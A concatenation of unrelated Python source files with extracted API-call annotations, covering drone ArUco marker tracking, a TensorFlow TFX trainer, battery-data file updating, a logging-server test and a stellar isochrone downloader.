ret_data = aruco.estimatePoseSingleMarkers(corners[idx], self.tracker_size, self._mtx, self._dst)
                #We need tvec here: the translation vector gives the marker's position with reference to the drone's camera.
                rvec, tvec = ret_data[0][0,0,:], ret_data[1][0,0,:]
                # These are the marker position vectors required to navigate the drone towards the UTA logo.
x = tvec[0]
y = tvec[1]
z = tvec[2]
angle = math.atan((corners[idx][0][2][1]-corners[idx][0][0][1])/(corners[idx][0][2][0]-corners[idx][0][0][0])) * (180/math.pi)
yaw_angle = angle
if angle < 0:
yaw_angle = angle + 90
else:
yaw_angle = angle - 90
a = yaw_angle
#Draw the detected marker and put a reference frame over it
aruco.drawDetectedMarkers(frame, corners)
aruco.drawAxis(frame, self._mtx, self._dst, rvec, tvec, 10)
print ("Marker X = %.1f Y = %.1f Z = %.1f "%(tvec[0], tvec[1], tvec[2]))
font = self.font
if gui:
#-- Print the tag position in camera frame
str_position = "MARKER Position x=%4.0f y=%4.0f z=%4.0f a = %3.1f "%(tvec[0], tvec[1], tvec[2],a)
cv2.putText(frame, str_position, (0, 100), font, 1, (0, 255, 0), 2, cv2.LINE_AA)
else:
print("Nothing detected ")
            # displaying the image on screen can be computationally heavy for the Pi when ArduPilot is also running in parallel.
            # make sure this is off when the drone is flying.
if gui:
#--- Display the frame
cv2.imshow('frame', frame)
#--- use 'q' to quit
key = cv2.waitKey(1) & 0xFF
if key == ord('q'):
self._cap.release()
cv2.destroyAllWindows()
break
if not loop:
# returning the positions of the logo
                self._kill = True
return (detected, x, y, z, a)
def small_track(self, loop=False, gui=None):
self.tracker_id = 15
self.tracker_size = 10.1
        (detected, x, y, z, a) = self.track(loop=loop, gui=gui)
        return (detected, x, y, z, a)
def big_track(self, loop=False, gui=None):
self.tracker_id = 4
self.tracker_size = 35.0
        (detected, x, y, z, a) = self.track(loop=loop, gui=gui)
return (detected, x, y, z, a)
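# A standalone sketch (added for illustration, not from the original file) of the
# corner-based yaw estimate used inside track(): atan of the marker diagonal
# (corner 0 to corner 2) gives the diagonal's angle, shifted by +/-90 degrees so
# that 0 means an upright marker. `corner` is assumed to be one entry of the list
# returned by aruco.detectMarkers, i.e. an array of shape (1, 4, 2).
def marker_yaw_degrees(corner):
    import math
    dy = corner[0][2][1] - corner[0][0][1]
    dx = corner[0][2][0] - corner[0][0][0]
    angle = math.atan(dy / dx) * (180 / math.pi)
    return angle + 90 if angle < 0 else angle - 90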
if __name__ == "__main__":
tracker_id = 15
tracker_size = 10.1 #- [cm]
    # paths to the camera matrix and distortion coefficients.
    # Our Raspberry Pi HQ camera doesn't have much distortion, but these values are absolutely
    # required to detect the marker; they are passed later to the detector function.
mtx = np.loadtxt('calib/cameraMatrix.txt', delimiter=',')
dst = np.loadtxt('calib/cameraDistortion.txt', delimiter=',')
# creating our aruco tracker object.
    aruco_tracker = ArucoTracker(tracker_id=tracker_id, tracker_size=tracker_size, gui=True, mtx=mtx, dst=dst)
    # initializing tracker for the specific id of the logo.
aruco_tracker.track()
|
[
"math.atan",
"cv2.aruco.estimatePoseSingleMarkers",
"cv2.aruco.drawDetectedMarkers",
"cv2.aruco.DetectorParameters_create",
"cv2.putText",
"cv2.cvtColor",
"cv2.waitKey",
"cv2.destroyAllWindows",
"time.time",
"cv2.aruco.Dictionary_get",
"cv2.VideoCapture",
"cv2.aruco.detectMarkers",
"numpy.shape",
"cv2.aruco.drawAxis",
"numpy.loadtxt",
"cv2.imshow"
] |
[((5528, 5579), 'numpy.loadtxt', 'np.loadtxt', (['"""calib/cameraMatrix.txt"""'], {'delimiter': '""","""'}), "('calib/cameraMatrix.txt', delimiter=',')\n", (5538, 5579), True, 'import numpy as np\n'), ((5592, 5647), 'numpy.loadtxt', 'np.loadtxt', (['"""calib/cameraDistortion.txt"""'], {'delimiter': '""","""'}), "('calib/cameraDistortion.txt', delimiter=',')\n", (5602, 5647), True, 'import numpy as np\n'), ((397, 437), 'cv2.aruco.Dictionary_get', 'aruco.Dictionary_get', (['aruco.DICT_6X6_250'], {}), '(aruco.DICT_6X6_250)\n', (417, 437), True, 'import cv2.aruco as aruco\n'), ((466, 499), 'cv2.aruco.DetectorParameters_create', 'aruco.DetectorParameters_create', ([], {}), '()\n', (497, 499), True, 'import cv2.aruco as aruco\n'), ((551, 570), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (567, 570), False, 'import cv2\n'), ((873, 884), 'time.time', 'time.time', ([], {}), '()\n', (882, 884), False, 'import sys, time, math\n'), ((1667, 1706), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2GRAY'], {}), '(frame, cv2.COLOR_BGR2GRAY)\n', (1679, 1706), False, 'import cv2\n'), ((1849, 1988), 'cv2.aruco.detectMarkers', 'aruco.detectMarkers', ([], {'image': 'gray', 'dictionary': 'self._aruco_dict', 'parameters': 'self._parameters', 'cameraMatrix': 'self._mtx', 'distCoeff': 'self._dst'}), '(image=gray, dictionary=self._aruco_dict, parameters=\n self._parameters, cameraMatrix=self._mtx, distCoeff=self._dst)\n', (1868, 1988), True, 'import cv2.aruco as aruco\n'), ((1469, 1484), 'numpy.shape', 'np.shape', (['frame'], {}), '(frame)\n', (1477, 1484), True, 'import numpy as np\n'), ((2401, 2491), 'cv2.aruco.estimatePoseSingleMarkers', 'aruco.estimatePoseSingleMarkers', (['corners[idx]', 'self.tracker_size', 'self._mtx', 'self._dst'], {}), '(corners[idx], self.tracker_size, self._mtx,\n self._dst)\n', (2432, 2491), True, 'import cv2.aruco as aruco\n'), ((3367, 3408), 'cv2.aruco.drawDetectedMarkers', 'aruco.drawDetectedMarkers', (['frame', 'corners'], {}), '(frame, corners)\n', (3392, 3408), True, 'import cv2.aruco as aruco\n'), ((3425, 3484), 'cv2.aruco.drawAxis', 'aruco.drawAxis', (['frame', 'self._mtx', 'self._dst', 'rvec', 'tvec', '(10)'], {}), '(frame, self._mtx, self._dst, rvec, tvec, 10)\n', (3439, 3484), True, 'import cv2.aruco as aruco\n'), ((4302, 4328), 'cv2.imshow', 'cv2.imshow', (['"""frame"""', 'frame'], {}), "('frame', frame)\n", (4312, 4328), False, 'import cv2\n'), ((2954, 3067), 'math.atan', 'math.atan', (['((corners[idx][0][2][1] - corners[idx][0][0][1]) / (corners[idx][0][2][0] -\n corners[idx][0][0][0]))'], {}), '((corners[idx][0][2][1] - corners[idx][0][0][1]) / (corners[idx][0\n ][2][0] - corners[idx][0][0][0]))\n', (2963, 3067), False, 'import sys, time, math\n'), ((3855, 3940), 'cv2.putText', 'cv2.putText', (['frame', 'str_position', '(0, 100)', 'font', '(1)', '(0, 255, 0)', '(2)', 'cv2.LINE_AA'], {}), '(frame, str_position, (0, 100), font, 1, (0, 255, 0), 2, cv2.LINE_AA\n )\n', (3866, 3940), False, 'import cv2\n'), ((4389, 4403), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (4400, 4403), False, 'import cv2\n'), ((4507, 4530), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (4528, 4530), False, 'import cv2\n')]
|
import tensorflow as tf
import tensorflow_model_analysis as tfma
from tfx.proto import trainer_pb2
def gzip_reader_fn(filenames):
return tf.data.TFRecordDataset(
filenames,
compression_type='GZIP')
def get_feature_spec():
feature_spec = {}
for key in range(0, 200):
feature_spec['var_{0}'.format(key)] = tf.io.FixedLenFeature([], dtype=tf.float32)
feature_spec['target'] = tf.io.FixedLenFeature([], dtype=tf.int64)
return feature_spec
def input_fn(filenames, tf_transform_output=None, batch_size=200):
    feature_spec = get_feature_spec()
    dataset = tf.data.experimental.make_batched_features_dataset(filenames, batch_size, feature_spec, reader=gzip_reader_fn)
features_dict = tf.compat.v1.data.make_one_shot_iterator(dataset).get_next()
label = features_dict.pop('target')
return features_dict, label
def eval_input_receiver():
feature_spec = get_feature_spec()
# input placeholder, bytes of a tf.Example
serialized_tf_example = tf.compat.v1.placeholder(
dtype=tf.string, shape=[None], name='input_example_tensor')
# parse input raw to tf.Example
features = tf.io.parse_example(serialized_tf_example, feature_spec)
return tfma.export.EvalInputReceiver(
features=features,
labels=features['target'],
receiver_tensors={'examples': serialized_tf_example})
def trainer_fn(trainer_fn_args, schema):
feature_columns = [tf.feature_column.numeric_column('var_{0}'.format(key)) for key in range(0, 200)]
estimator = tf.estimator.DNNClassifier(
feature_columns=feature_columns,
hidden_units=[50, 25])
train_spec = tf.estimator.TrainSpec(
lambda: input_fn(trainer_fn_args.train_files),
max_steps=trainer_fn_args.train_steps)
eval_spec = tf.estimator.EvalSpec(
lambda: input_fn(trainer_fn_args.eval_files),
steps=trainer_fn_args.eval_steps)
receiver_fn = lambda: eval_input_receiver()
return {
'estimator': estimator,
'train_spec': train_spec,
'eval_spec': eval_spec,
'eval_input_receiver_fn': receiver_fn
}
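# A small self-contained check (illustrative; not from the original module):
# serialize one tf.Example matching get_feature_spec() and parse it back, which
# confirms the spec round-trips the 200 float features plus the int64 target.
# The dict returned by trainer_fn would normally be consumed by
# tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec).
def _feature_spec_roundtrip():
    feature = {'var_{0}'.format(k): tf.train.Feature(
                   float_list=tf.train.FloatList(value=[float(k)]))
               for k in range(0, 200)}
    feature['target'] = tf.train.Feature(int64_list=tf.train.Int64List(value=[1]))
    example = tf.train.Example(features=tf.train.Features(feature=feature))
    parsed = tf.io.parse_single_example(example.SerializeToString(), get_feature_spec())
    return parsed['target']  # scalar int64 tensor holding 1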
|
[
"tensorflow_model_analysis.export.EvalInputReceiver",
"tensorflow.data.TFRecordDataset",
"tensorflow.compat.v1.placeholder",
"tensorflow.data.experimental.make_batched_features_dataset",
"tensorflow.compat.v1.data.make_one_shot_iterator",
"tensorflow.io.parse_example",
"tensorflow.io.FixedLenFeature",
"tensorflow.estimator.DNNClassifier"
] |
[((140, 199), 'tensorflow.data.TFRecordDataset', 'tf.data.TFRecordDataset', (['filenames'], {'compression_type': '"""GZIP"""'}), "(filenames, compression_type='GZIP')\n", (163, 199), True, 'import tensorflow as tf\n'), ((399, 440), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['[]'], {'dtype': 'tf.int64'}), '([], dtype=tf.int64)\n', (420, 440), True, 'import tensorflow as tf\n'), ((595, 701), 'tensorflow.data.experimental.make_batched_features_dataset', 'tf.data.experimental.make_batched_features_dataset', (['filenames', '(10)', 'feature_spec'], {'reader': 'gzip_reader_fn'}), '(filenames, 10,\n feature_spec, reader=gzip_reader_fn)\n', (645, 701), True, 'import tensorflow as tf\n'), ((982, 1071), 'tensorflow.compat.v1.placeholder', 'tf.compat.v1.placeholder', ([], {'dtype': 'tf.string', 'shape': '[None]', 'name': '"""input_example_tensor"""'}), "(dtype=tf.string, shape=[None], name=\n 'input_example_tensor')\n", (1006, 1071), True, 'import tensorflow as tf\n'), ((1121, 1177), 'tensorflow.io.parse_example', 'tf.io.parse_example', (['serialized_tf_example', 'feature_spec'], {}), '(serialized_tf_example, feature_spec)\n', (1140, 1177), True, 'import tensorflow as tf\n'), ((1188, 1321), 'tensorflow_model_analysis.export.EvalInputReceiver', 'tfma.export.EvalInputReceiver', ([], {'features': 'features', 'labels': "features['target']", 'receiver_tensors': "{'examples': serialized_tf_example}"}), "(features=features, labels=features['target'],\n receiver_tensors={'examples': serialized_tf_example})\n", (1217, 1321), True, 'import tensorflow_model_analysis as tfma\n'), ((1497, 1584), 'tensorflow.estimator.DNNClassifier', 'tf.estimator.DNNClassifier', ([], {'feature_columns': 'feature_columns', 'hidden_units': '[50, 25]'}), '(feature_columns=feature_columns, hidden_units=[\n 50, 25])\n', (1523, 1584), True, 'import tensorflow as tf\n'), ((328, 371), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['[]'], {'dtype': 'tf.float32'}), '([], dtype=tf.float32)\n', (349, 371), True, 'import tensorflow as tf\n'), ((717, 766), 'tensorflow.compat.v1.data.make_one_shot_iterator', 'tf.compat.v1.data.make_one_shot_iterator', (['dataset'], {}), '(dataset)\n', (757, 766), True, 'import tensorflow as tf\n')]
|
import os
from sys import platform
from typing import Any, Dict, List
import pymysql
import yaml
url_prefix = 'api/v%s' % ('.'.join(os.environ['UWKGM_API_VERSION'].split('.')[:2]))
def envyml(name: str, base_dir: str, var: str) -> Any:
def walk(sub_tree: Dict[str, Any], sub_path: List[str]) -> Any:
return walk(sub_tree[sub_path[0]], sub_path[1:]) if len(sub_path) > 1 else sub_tree[sub_path[0]]
path = var.split('.')
return walk(yaml.safe_load(open('%s/env/%s.yaml' % (base_dir, path[0]), 'r'))[os.environ[name]], path[1:])
if platform == 'darwin':
pymysql.install_as_MySQLdb()
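# A minimal demonstration (added; the data is made up) of the dotted-path walk
# that envyml performs on the loaded YAML tree, without touching the filesystem:
def _walk_demo() -> str:
    tree = {'mysql': {'host': 'localhost', 'port': 3306}}
    def walk(sub_tree, sub_path):
        return walk(sub_tree[sub_path[0]], sub_path[1:]) if len(sub_path) > 1 else sub_tree[sub_path[0]]
    return walk(tree, 'mysql.host'.split('.'))  # -> 'localhost'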
|
[
"pymysql.install_as_MySQLdb"
] |
[((583, 611), 'pymysql.install_as_MySQLdb', 'pymysql.install_as_MySQLdb', ([], {}), '()\n', (609, 611), False, 'import pymysql\n')]
|
import pathlib
import os
import sys
import cellpy
from cellpy import cellreader
from cellpy import log
log.setup_logging(default_level="DEBUG")
def load_c_file(filename):
c = cellreader.CellpyData()
c.load(filename)
return c
def load_r_file(filename):
c = cellreader.CellpyData()
c.from_raw(filename)
return c
def update(c):
c.make_step_table()
c.make_summary(find_ir=True)
return c
print("updating cellpy files")
hdf_dir = pathlib.Path("../testdata/hdf5").resolve()
res_dir = pathlib.Path("../testdata/data").resolve()
print(f"cellpy file directory: {hdf_dir.is_dir()}")
files = os.listdir(hdf_dir)
print(f"content: {files}")
print(f"raw file directory: {res_dir.is_dir()}")
files = os.listdir(res_dir)
print(f"content: {files}")
standard_file = hdf_dir / "20160805_test001_45_cc.h5"
extra_file = hdf_dir / "20160805_test001_47_cc.h5"
standard_raw_file = res_dir / "20160805_test001_45_cc_01.res"
updated_standard_file = hdf_dir / "20160805_test001_45_cc.h5"
updated_extra_file = hdf_dir / "20160805_test001_47_cc.h5"
#
c = load_r_file(standard_raw_file)
print(f"{c.cell.raw.columns}")
c.make_step_table()
c.make_summary(find_ir=True)
c.save(updated_standard_file)
#
# print(f"loading standard file {standard_file}")
# c = load_c_file(standard_file)
# print("updating")
# c = update(c)
# print(f"saving")
# c.save(updated_standard_file)
print(f"loading standard file {extra_file}")
c = load_c_file(extra_file)
print("updating")
c = update(c)
print(f"saving")
c.save(updated_extra_file)
|
[
"pathlib.Path",
"cellpy.log.setup_logging",
"cellpy.cellreader.CellpyData",
"os.listdir"
] |
[((105, 145), 'cellpy.log.setup_logging', 'log.setup_logging', ([], {'default_level': '"""DEBUG"""'}), "(default_level='DEBUG')\n", (122, 145), False, 'from cellpy import log\n'), ((627, 646), 'os.listdir', 'os.listdir', (['hdf_dir'], {}), '(hdf_dir)\n', (637, 646), False, 'import os\n'), ((732, 751), 'os.listdir', 'os.listdir', (['res_dir'], {}), '(res_dir)\n', (742, 751), False, 'import os\n'), ((183, 206), 'cellpy.cellreader.CellpyData', 'cellreader.CellpyData', ([], {}), '()\n', (204, 206), False, 'from cellpy import cellreader\n'), ((278, 301), 'cellpy.cellreader.CellpyData', 'cellreader.CellpyData', ([], {}), '()\n', (299, 301), False, 'from cellpy import cellreader\n'), ((470, 502), 'pathlib.Path', 'pathlib.Path', (['"""../testdata/hdf5"""'], {}), "('../testdata/hdf5')\n", (482, 502), False, 'import pathlib\n'), ((523, 555), 'pathlib.Path', 'pathlib.Path', (['"""../testdata/data"""'], {}), "('../testdata/data')\n", (535, 555), False, 'import pathlib\n')]
|
import pkg_resources
pkg_resources.declare_namespace(__name__)
__version__ = '2'
|
[
"pkg_resources.declare_namespace"
] |
[((21, 62), 'pkg_resources.declare_namespace', 'pkg_resources.declare_namespace', (['__name__'], {}), '(__name__)\n', (52, 62), False, 'import pkg_resources\n')]
|
import requests, json
def get_subs(page):
metadata = get_metadata(page)
return metadata['subtitles']
def get_metadata(page):
meta = page.text.split('vilos.config.media = ')[1].split(';\n\n')[0]
return json.loads(meta)
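# A small self-contained check (illustrative only): get_metadata expects any object
# with a .text attribute holding the embedded vilos player config, so a stub works
# in place of a real requests.Response. The config content below is made up.
if __name__ == "__main__":
    class _FakePage:
        text = 'junk vilos.config.media = {"subtitles": [{"language": "enUS"}]};\n\nmore junk'
    assert get_subs(_FakePage()) == [{"language": "enUS"}]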
|
[
"json.loads"
] |
[((219, 235), 'json.loads', 'json.loads', (['meta'], {}), '(meta)\n', (229, 235), False, 'import requests, json\n')]
|
#!/usr/bin/env python -OO
# encoding: utf-8
###########
# ORP - Open Robotics Platform
#
# Copyright (c) 2010 <NAME>, <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
##########
"""
test_logging.py - Tests the logging capabilities of the server!
Created by <NAME> on 2010-09-24.
"""
__author__ = "<NAME>"
__copyright__ = "Copyright (c) 2010 <NAME>, <NAME>"
### Imports ###
# Standard Python Libraries
import sys
import os
import unittest
import SocketServer
import logging.handlers
import struct
import cPickle
import test_helper
try:  # try to catch any missing dependencies
# <PKG> for <PURPOSE>
PKGNAME = '<EASY_INSTALL NAME>'
# import <LIBRARY NAME>
del PKGNAME
except ImportError as e: # We are missing something, let them know...
sys.stderr.write("You might not have the "+PKGNAME+" module, \
try 'easy_install "+PKGNAME+"', else consult google.\n"+e)
### Class ###
class LogRecordStreamHandler(SocketServer.StreamRequestHandler):
"""Handler for a streaming logging request.
This basically logs the record using whatever logging policy is
configured locally.
"""
def handle(self):
"""
Handle multiple requests - each expected to be a 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally.
"""
while 1:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unPickle(chunk)
record = logging.makeLogRecord(obj)
self.handleLogRecord(record)
def unPickle(self, data):
return cPickle.loads(data)
def handleLogRecord(self, record):
# if a name is specified, we use the named logger rather than the one
# implied by the record.
if self.server.logname is not None:
name = self.server.logname
else:
name = record.name
logger = logging.getLogger(name)
# N.B. EVERY record gets logged. This is because Logger.handle
# is normally called AFTER logger-level filtering. If you want
# to do filtering, do it at the client end to save wasting
# cycles and network bandwidth!
logger.handle(record)
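# A hedged client-side sketch (added for illustration; not part of the original
# test): the stdlib SocketHandler emits exactly the wire format handle() expects,
# a 4-byte big-endian length followed by the pickled LogRecord attribute dict.
#
#   sock_handler = logging.handlers.SocketHandler(
#       'localhost', logging.handlers.DEFAULT_TCP_LOGGING_PORT)
#   logging.getLogger().addHandler(sock_handler)
#   logging.getLogger().warning("hello over TCP")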
class LogRecordSocketReceiver(SocketServer.ThreadingTCPServer):
"""simple TCP socket-based logging receiver suitable for testing"""
allow_reuse_address = 1
def __init__(self, host='',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
SocketServer.ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = 0
self.timeout = 5
self.logname = None
from threading import Lock
self.lock = Lock()
def serve_until_stopped(self):
"""docstring"""
self.lock.acquire()
import select
rd, wr, ex = select.select([self.socket.fileno()],
[], [],
self.timeout)
if rd:
self.result = True
else:
self.result = False
self.lock.release()
def serveUntilStopped(self):
"""docstring for serve_until_stopped"""
import thread
thread.start_new_thread(self.serve_until_stopped, ())
def getResult(self):
"""docstring for getResult"""
self.lock.acquire()
result = self.result
self.lock.release()
return result
class ORPDLoggingTestCases(unittest.TestCase):
"""Test case for the ORPD"""
def setUp(self):
"""Setup for tests"""
self.proc, self.server = test_helper.startServerIfStopped()
def test10_TestXMLRPCLogging(self):
"""Tests the posting of logs to the daemon
through the xmlrpc interface"""
self.server.info("Info Message")
self.server.debug("Debug Message")
self.server.warning("Warning Message")
self.server.error("Error Message")
self.server.critical("Critical Message")
def test00_NetworkLogging(self):
"""Trys to connect to and get logging messages"""
logserver = LogRecordSocketReceiver()
logserver.serveUntilStopped()
import time
time.sleep(1)
self.server.connect()
self.server.info("Testing network logging")
self.assertTrue(logserver.getResult())
del logserver
def tearDown(self):
"""Cleanup"""
pass
### Functions ###
### IfMain ###
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"thread.start_new_thread",
"time.sleep",
"threading.Lock",
"test_helper.startServerIfStopped",
"sys.stderr.write",
"SocketServer.ThreadingTCPServer.__init__"
] |
[((5815, 5830), 'unittest.main', 'unittest.main', ([], {}), '()\n', (5828, 5830), False, 'import unittest\n'), ((1750, 1902), 'sys.stderr.write', 'sys.stderr.write', (['(\'You might not have the \' + PKGNAME +\n " module, try \'easy_install " + PKGNAME +\n """\', else consult google.\n""" + e)'], {}), '(\'You might not have the \' + PKGNAME +\n " module, try \'easy_install " + PKGNAME +\n """\', else consult google.\n""" + e)\n', (1766, 1902), False, 'import sys\n'), ((3796, 3865), 'SocketServer.ThreadingTCPServer.__init__', 'SocketServer.ThreadingTCPServer.__init__', (['self', '(host, port)', 'handler'], {}), '(self, (host, port), handler)\n', (3836, 3865), False, 'import SocketServer\n'), ((3997, 4003), 'threading.Lock', 'Lock', ([], {}), '()\n', (4001, 4003), False, 'from threading import Lock\n'), ((4497, 4550), 'thread.start_new_thread', 'thread.start_new_thread', (['self.serve_until_stopped', '()'], {}), '(self.serve_until_stopped, ())\n', (4520, 4550), False, 'import thread\n'), ((4895, 4929), 'test_helper.startServerIfStopped', 'test_helper.startServerIfStopped', ([], {}), '()\n', (4927, 4929), False, 'import test_helper\n'), ((5502, 5515), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (5512, 5515), False, 'import time\n')]
|
"""
EZBASTI -- A Python package that allows you to download BASTI isochrones directly
from the BASTI website, based on EZPADOVA and EZBASTI.
:version: 0.1
:author: <NAME>
"""
from __future__ import print_function, unicode_literals, division
import sys
import os
import inspect
import time
from io import StringIO, BytesIO
import zlib
import re
import json
if sys.version_info[0] > 2:
py3k = True
from urllib.parse import urlencode
from urllib import request
from urllib.request import urlopen
else:
py3k = False
from urllib import urlencode
from urllib2 import urlopen
from io import BytesIO
import urllib.request
import tarfile
from astropy.table import Table
list_model=[['model=01,Solar-Scaled[alpha/Fe]=0.0,Overshooting:No,Diffusion:No,Mass loss:n=0.0,He=0.247','P00','P00O0D0E0Y247',],
['model=02,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:No,Mass loss:n=0.0,He=0.247','P00','P00O1D0E0Y247',],
['model=03,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:No,Mass loss:n=0.3,He=0.247','P00','P00O1D0E1Y247',],
['model=04,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.247','P00','P00O1D1E1Y247',],
['model=11,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.247','P04','P04O1D1E1Y247',],
['model=12,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.275','P04','P04O1D1E1Y275',],
['model=13,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.300','P04','P04O1D1E1Y300',],
['model=14,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.320','P04','P04O1D1E1Y320']]
def get_one_isochrone(model='01',FeH=0.0,age=16e6,photometry='HR'):
'''
    Get a BASTI isochrone from the website:
    model:str       Get the model number using print_model()
    FeH:float       Metallicity
    age:float       in years
    photometry:str  Get the photometric system using print_photometric_system()
model:
model=01,Solar-Scaled[alpha/Fe]=0.0,Overshooting:No,Diffusion:No,Mass loss:n=0.0,He=0.247
model=02,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:No,Mass loss:n=0.0,He=0.247
model=03,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:No,Mass loss:n=0.3,He=0.247
model=04,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.247
model=11,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.247
model=12,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.275
model=13,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.300
model=14,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.320
photometry:
"HR":HR diagram
"2MASS":2MASS
"DECAM":DECam
"Euclid":Euclid (VIS+NISP)
"GAIA-DR1":GAIA DR1
"GAIA-DR2":GAIA DR2
"GAIA-DR3":GAIA DR3
"GALEX":GALEX
"Tycho":Hipparcos+Tycho
"WFPC2":HST (WFPC2)
"ACS":HST (ACS)
"WFC3":HST (WFC3)
"JPLUS":JPLUS
"JohnsonCousins":JohnsonCousins
"JWST_NIRCam":JWST (NIRCam)
"JWST_NIRISS":JWST (NIRISS)
"Kepler":Kepler
"PanSTARSS1":PanSTARSS1
"SAGE":SAGE
"SkyMapper":SkyMapper
"Sloan":Sloan
"Spitzer_IRAC":Spitzer (IRAC)
:"Stromgren":Strömgren
"Subaru_HSC":Subaru (HSC)
"SWIFT_UVOT":SWIFT (UVOT)
"TESS":TESS
"UVIT":UVIT (FUV+NUV+VIS)
"LSST":<NAME> Obs. (LSST)
"VISTA":VISTA
"WFIRST":WFIRST (WFI)
"WISE":WISE
'''
download_url='http://basti-iac.oa-abruzzo.inaf.it/TEMP/'
url=_query(model=model,FeH=FeH,age=age,photometry=photometry)
print('Interrogating {0}...'.format(url))
print('Request...', end='')
c = urlopen(url).read()
c=c.decode()
fname = re.compile('href=".*z').findall(c)[0].split('/')[2]
min_age,max_age=_check_age(c)
    if (age >= min_age) and (age <= max_age):
# furl = _cfg['download_url'] + fname
furl = download_url + fname
tarfile_url = furl
print('Request...', end='')
ftpstream = urllib.request.urlopen(tarfile_url)
tmpfile = BytesIO()
while True:
s = ftpstream.read(16384)
if not s:
break
tmpfile.write(s)
ftpstream.close()
tmpfile.seek(0)
tfile = tarfile.open(fileobj=tmpfile, mode="r:gz")
tfile_members2 = [filename for filename in tfile.getnames()]
tfile_extract1 = tfile.extractfile(tfile_members2[0])
tfile_extract_text = tfile_extract1.read().decode()
tfile.close()
tmpfile.close()
print('decompressing archive...')
text=tfile_extract_text.split('\n')
#print(text)
lines = [line_num for line_num, line_content in enumerate(text) if 'M/Mo(ini) ' in line_content]
header_full=text[lines[0]].split(' ')
header = [string for string in header_full if (string != "") & (string != "#")]
data=Table.read(text,format='ascii',names=header)
headline = [line_content for line_num, line_content in enumerate(text) if 'Np' in line_content]
if len(headline)>0:
lines = [line_content.replace('=',':').replace(" ","") for line_num, line_content in enumerate(headline[0].split(' ')) if '=' in line_content]
dict_key={}
for line in lines:
dict_key.update({line.split(':')[0]:float(line.split(':')[1])})
data[line.split(':')[0]]=float(line.split(':')[1])
print("done.")
return data
else:
        print('Age not within range')
print('Min Age:',min_age,'yr')
print('Max Age:',max_age,'yr')
return 0
def _select_model(model):
list_model=[['model=01,Solar-Scaled[alpha/Fe]=0.0,Overshooting:No,Diffusion:No,Mass loss:n=0.0,He=0.247','P00','P00O0D0E0Y247',],
['model=02,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:No,Mass loss:n=0.0,He=0.247','P00','P00O1D0E0Y247',],
['model=03,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:No,Mass loss:n=0.3,He=0.247','P00','P00O1D0E1Y247',],
['model=04,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.247','P00','P00O1D1E1Y247',],
['model=11,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.247','P04','P04O1D1E1Y247',],
['model=12,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.275','P04','P04O1D1E1Y275',],
['model=13,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.300','P04','P04O1D1E1Y300',],
